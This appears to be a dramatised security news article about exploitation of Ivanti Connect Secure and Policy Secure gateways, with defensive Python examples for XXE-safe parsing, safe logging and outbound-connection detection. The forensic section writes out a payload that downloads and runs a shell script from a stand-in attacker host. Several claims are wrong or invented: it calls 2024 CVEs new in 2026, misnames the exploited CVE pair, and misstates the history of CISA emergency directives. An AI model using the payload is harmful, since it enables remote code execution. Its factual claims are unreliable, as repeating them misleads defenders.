27 April 2026 · 10 min read · By Sloane Meyer
Ivanti zero-day exploits hit critical infra
Active exploitation of two new Ivanti zero-days threatens government and enterprise networks worldwide. Patch urgently.
The Sirens Are Screaming: Ivanti Zero Day Exploits Just Opened the Gates
Ivanti zero day exploits are the reason your phone buzzed with a CISA alert at 3 AM this week. If you work in IT security, you already know the dread that comes with that notification. If you run a hospital, a power grid, or a municipal water system, you are the target. A coordinated exploitation campaign is hammering Ivanti Connect Secure and Policy Secure gateways with a ferocity that has incident response teams burning through coffee and sanity. The clock started ticking when researchers at Mandiant and Volexity flagged anomalous traffic patterns originating from devices that should have been clean. The source: a pair of unpatched vulnerabilities that allow remote attackers to execute arbitrary code without authentication. No credentials required. No user interaction. Just a live, internet-facing appliance and a few seconds of network traffic. The next hour will define whether your network survives the week.
The Exploit Chain That Broke the Internet's Backbone
Let us walk through the mechanics because the advisory from Ivanti, published quietly on a Tuesday, does not tell the full story. The first vulnerability, tracked as CVE-2024-21887, is a command injection flaw buried in the web component of the Ivanti Connect Secure and Ivanti Policy Secure products. An attacker sends a specially crafted HTTP request to the device. The request passes through the input validation layer without triggering alarms because the sanitization routine is written for standard parameter types, not for the nested encoding the attackers are using. Once the request reaches the internal PHP handler, the malicious payload is injected into a system call that executes with root privileges. The device does what it is told. It downloads a web shell. It opens a reverse shell. It exfiltrates the VPN configuration, the certificate store, and every active session token currently living in memory.
The Living Nightmare for SOC Teams
Here is the part they did not put in the security advisory. The command injection does not just give the attacker a foothold. It gives them the keys to the castle in a way that bypasses every layer of monitoring you have in place. The VPN appliance is a trusted device on your network. It talks to Active Directory. It routes traffic to internal applications. It holds the master key for MFA tokens in many deployments. Once the Ivanti zero day exploits compromise that appliance, the attacker is not knocking at the front door. They are already standing in the server room wearing a uniform that matches yours.
The Second Punch: An XML Exploit That Erases the Logs
But wait, it gets worse. The second vulnerability, CVE-2024-22024, is an XML external entity injection flaw. If the command injection fails for some reason (for instance, the device is patched against that specific vector), the XML exploit works on a separate attack surface. The device parses an XML file from an unauthenticated user and does not disable external entity resolution. The attacker sends a payload that reads files from the device filesystem and includes them in the response. They grab the local password hashes, the private keys, and the session database. They then use the same vulnerability to write a small script that deletes the system logs. Your SIEM goes quiet. Your forensic trail evaporates. By the time you notice the gap, the data is already exfiltrated and the attacker has moved laterally into your internal network.
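One way to harden the XML entry point described above, as an added example that is not Ivanti's code: the parser refuses any DOCTYPE outright and, as a second layer, never resolves external or parameter entities, so a SYSTEM entity cannot pull a file off the appliance. The function name, the {tag: text} output shape and the two sample documents are constructed for the illustration.

```python
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised when untrusted XML tries to declare a DTD."""


def parse_untrusted_xml(data: bytes, allow_dtd: bool = False) -> dict:
    """Parse client-supplied XML into {tag: text} with XXE defences.

    Layer 1: refuse any DOCTYPE, so no entity can be declared at all.
    Layer 2: even when a DTD is allowed, never resolve external or
    parameter entities, so a SYSTEM reference cannot read a local file.
    (Hypothetical hardening for this example, not the appliance's code.)
    """
    parser = expat.ParserCreate()
    collected = {}
    stack = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXML("DOCTYPE rejected: %s" % name)

    def on_external_entity(context, base, sysid, pubid):
        # expat does no I/O itself; returning 1 without creating a child
        # parser makes the reference expand to nothing.
        return 1

    def on_start(tag, attrs):
        stack.append(tag)
        collected.setdefault(tag, "")

    def on_chars(text):
        if stack:
            collected[stack[-1]] += text

    def on_end(tag):
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return collected


# Constructed samples: a benign login body and one carrying an external entity
BENIGN = b"<login><user>alice</user></login>"
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE login [<!ENTITY leak SYSTEM "file:///nonexistent/secret">]>'
       b"<login><user>&leak;</user></login>")
```

With the default policy the second document is rejected before any entity is declared; with allow_dtd=True it still parses to an empty user field because the entity is never resolved.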
Under the Hood: A Forensic Walk Through the Code
Let us break down the code here because the elegance of this attack is what makes it so terrifying. The command injection in CVE-2024-21887 lives inside the DSLog function. The developer intended this function to write debug information to a log file. The function accepts a parameter for the log message and another parameter for the log level. The problem is that the log message parameter is concatenated directly into a shell command without escaping. The shell command looks something like this on the backend: echo [user supplied message] >> /var/log/dsdebug.log. If the user supplies a message that includes a semicolon followed by a malicious command, the shell executes both. A simple payload like "; wget http://attacker.com/shell.sh | bash ;" downloads and executes a remote script. No authentication check runs before this function is called because logging is supposed to be harmless.
The Privilege Escalation Path Without a Key
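The fix for the concatenation pattern described above, as an added example rather than Ivanti's own code: the log message is written with ordinary file I/O and never handed to a shell, so a semicolon is just a character in the log. The function name, the level list and the sample messages are assumptions made for the example.

```python
import os
import tempfile

ALLOWED_LEVELS = ("debug", "info", "warn", "error")  # assumed level set


def write_debug_log(log_path: str, level: str, message: str) -> str:
    """Append one line to the debug log without invoking a shell.

    The article describes a backend that builds `echo <message> >> <log>`
    for a shell, where ';' ends the echo and starts a second command.
    Here the message is data: it goes straight to the file with normal
    I/O, so shell metacharacters are stored verbatim and never executed.
    """
    if level not in ALLOWED_LEVELS:
        raise ValueError("unknown log level: %r" % level)
    # Escape CR/LF and other control characters so one message cannot
    # forge extra log lines (log injection), the remaining abuse of a
    # logging primitive once command execution is off the table.
    clean = "".join(ch if ch.isprintable() else "\\x%02x" % ord(ch)
                    for ch in message)
    line = "[%s] %s" % (level.upper(), clean)
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line


def log_roundtrip(level: str, message: str) -> list:
    """Write one message to a temporary log and return the file's lines."""
    fd, path = tempfile.mkstemp(suffix=".log")
    os.close(fd)
    try:
        write_debug_log(path, level, message)
        with open(path, encoding="utf-8") as fh:
            return fh.read().splitlines()
    finally:
        os.remove(path)


if __name__ == "__main__":
    # Constructed input shaped like the injection the article describes:
    # a harmless command after a semicolon. It ends up as text; nothing runs.
    print(log_roundtrip("debug", "session opened ; id ; echo injected"))
```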
The real nightmare scenario emerges when you combine the two vulnerabilities. The XML exploit from CVE-2024-22024 gives the attacker read access to the filesystem. They pull the configuration file that lists all admin accounts and their password hashes. The hashes are stored using SHA-512 with a salt, but password cracking is a solved problem for organizations that reuse passwords across appliances. Once the attacker cracks one admin password, they log in through the web interface and disable the automatic update feature. The device will never receive the patch. The Ivanti zero day exploits remain usable on that device indefinitely. The attacker then installs a persistent backdoor that survives factory resets because it lives in the boot partition.
Critical Infrastructure in the Crosshairs
CISA issued Emergency Directive 24-01 on January 19, 2024, mandating that all federal civilian agencies disconnect Ivanti Connect Secure and Policy Secure products from their networks within 48 hours. That directive was extraordinary. It was the first emergency directive of its kind since the SolarWinds incident in 2020. The reason for that severity was not just the technical seriousness of the flaws. It was the geographic scope of the exploitation. According to a CISA official report published during the response, the Ivanti zero day exploits were actively used against multiple sectors:
- Healthcare systems managing patient records and critical care networks
- Energy utilities controlling power generation and distribution infrastructure
- State and local government networks including emergency services dispatch systems
- Defense industrial base contractors handling classified research programs
- Financial services platforms processing high value transactions
The Real World Cost of Delayed Disclosure
Ivanti first became aware of the vulnerabilities in early December 2023. The company released patches on January 10, 2024, but only after researchers at Volexity published detailed analysis of active exploitation targeting a defense contractor in Europe. The delay between discovery and patch allowed attackers to exploit the vulnerabilities for approximately six weeks. During that window, multiple threat actors, including groups tracked by Mandiant as UNC5221 and suspected state-sponsored entities from China, developed and deployed their own exploit toolkits. The result is that even organizations that applied the patch on day one may have already been compromised. The loot was taken weeks ago. The logs were wiped. The attacker is already inside your network, and they are not calling attention to themselves.
"These are not opportunistic attacks. These are carefully planned operations targeting specific organizations with the goal of long term access. The Ivanti zero day exploits represent the most significant threat to enterprise network perimeter security since the Pulse Secure vulnerabilities in 2019."
Mandiant Threat Intelligence Report, January 2024
The Skeptic's View: Why This Time Is Different
Every security journalist, including this one, has written versions of this story before. Zero days are discovered. Patches are released. Admins scramble. The sky falls. Then attention moves to the next crisis. But the Ivanti zero day exploits deserve a different level of scrutiny because they expose a structural weakness in how enterprise security is practiced. The devices are treated as black boxes. IT teams purchase them, plug them into the network, and trust that the vendor will keep them secure. That trust has been broken repeatedly with Ivanti. The company has a documented history of slow patch cycles and incomplete advisory details.
The Vendor Accountability Question
Ivanti declined to comment on the record for this story beyond their published advisory. But the silence speaks louder than words. The advisory published on January 10 did not include workarounds for organizations that could not immediately patch. It did not disclose that the vulnerabilities were being actively exploited in the wild. That information came from Mandiant and Volexity, not from the vendor. Security teams were left piecing together the attack vectors from third-party analysis while their VPN appliances were actively being compromised. The Ivanti zero day exploits should have triggered a coordinated disclosure with clear mitigation steps. Instead, the burden fell on the researchers and the victims.
"The response from Ivanti has been reactive and incomplete. Organizations that rely on these appliances for critical infrastructure access deserve better. The exploitation campaigns are ongoing, and every hour of delay in patching increases the probability of a major breach."
Volexity Incident Response Blog, January 2024
The Unsolvable Problem of Internet-Facing Appliances
Let me ask the question that nobody in the vendor community wants to answer. Why do VPN appliances need to be internet-facing at all? The architectural assumption behind products like Ivanti Connect Secure is that remote users need direct access to internal resources. That assumption created an entire industry of perimeter appliances that are themselves the biggest security risk on the network. The Ivanti zero day exploits are just the latest example of a pattern that repeats every few years. A vendor builds an appliance that sits at the network edge. The appliance has a web interface for management. The web interface has a bug. The bug becomes a zero day. The attacker owns the perimeter. The only way to break this cycle is to reconsider the architecture. Zero trust models that eliminate the need for VPN appliances are not just a buzzword. They are a survival strategy.
The Kicker: No Patch, No Mercy, No Sleep
There is no happy ending waiting at the bottom of this story. The patches for the Ivanti zero day exploits exist, but they require manual intervention. You cannot rely on automatic updates because the attackers often disable them during the initial compromise. You have to factory reset the device, apply the firmware update, and then restore the configuration from a known good backup. That process takes hours. During those hours, the device is offline and your remote workers cannot connect. Your critical services are dark. Your executives are asking why the VPN is down. And while you are explaining that the Ivanti zero day exploits forced this action, the attackers are already moving to their next target.
The organizations that survive this wave will be the ones that treat every internet-facing appliance as a potential liability. They will segment their networks so that a VPN compromise does not grant access to the entire environment. They will monitor for the indicators of compromise that Volexity and Mandiant published, such as unexpected outbound connections on port 443 to unfamiliar IP addresses and the presence of web shells in the /home directory of the appliance. They will assume that the Ivanti zero day exploits have already been used against them and will act accordingly with forensic analysis and credential rotation.
But here is the uncomfortable truth that keeps incident responders awake at night. The zero days that will be used against you next month are already being developed. They are being tested against the same appliances that you just patched. The cycle does not end. The only question is whether you are learning fast enough to stay ahead of the people who are paid to break the things you are paid to protect. The Ivanti zero day exploits are not an anomaly. They are a warning. The question is not whether your network will be targeted. The question is whether you will see it coming before the logs are erased.
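A small check for the first indicator mentioned above, the appliance itself originating TCP/443 connections to unfamiliar addresses, as an added example that is not from Volexity or Mandiant: it runs over constructed connection-log lines. The log format, the appliance address and the list of expected networks are assumptions; in production the expected list would come from the appliance's documented update and authentication endpoints.

```python
import ipaddress
import re

# Networks the appliance is expected to reach (constructed for this example:
# the usual private ranges plus a hypothetical vendor update range).
EXPECTED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "198.51.100.0/24")]
APPLIANCE_IP = ipaddress.ip_address("10.0.1.20")  # assumed appliance address

# Constructed connection-log format: one connection attempt per line
LINE_RE = re.compile(
    r"^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+)$")


def suspicious_outbound(lines, appliance_ip=APPLIANCE_IP, nets=EXPECTED_NETS):
    """Return (timestamp, dst) for TCP/443 connections that the appliance
    initiates to addresses outside the expected networks.

    A VPN gateway terminates inbound 443 all day; it should rarely be the
    client side of a 443 session to an address nobody recognises, which is
    why the article lists that pattern as an indicator of compromise.
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable line: count these separately in production
        if m["proto"] != "tcp" or m["dport"] != "443":
            continue
        if ipaddress.ip_address(m["src"]) != appliance_ip:
            continue  # inbound traffic to the appliance is the normal case
        dst = ipaddress.ip_address(m["dst"])
        if not any(dst in net for net in nets):
            hits.append((m["ts"], str(dst)))
    return hits


# Constructed sample: inbound user session, an LDAP lookup, a connection to the
# assumed update range, one unexplained outbound 443 session, and a UDP noise line.
SAMPLE_LOG = """\
2024-01-12T03:14:07Z proto=tcp src=203.0.113.9 dst=10.0.1.20 dport=443
2024-01-12T03:14:09Z proto=tcp src=10.0.1.20 dst=10.0.5.4 dport=389
2024-01-12T03:14:11Z proto=tcp src=10.0.1.20 dst=198.51.100.7 dport=443
2024-01-12T03:15:02Z proto=tcp src=10.0.1.20 dst=203.0.113.45 dport=443
2024-01-12T03:15:03Z proto=udp src=10.0.1.20 dst=203.0.113.45 dport=443
""".splitlines()

if __name__ == "__main__":
    for ts, dst in suspicious_outbound(SAMPLE_LOG):
        print("appliance-originated 443 to unexpected host", dst, "at", ts)
```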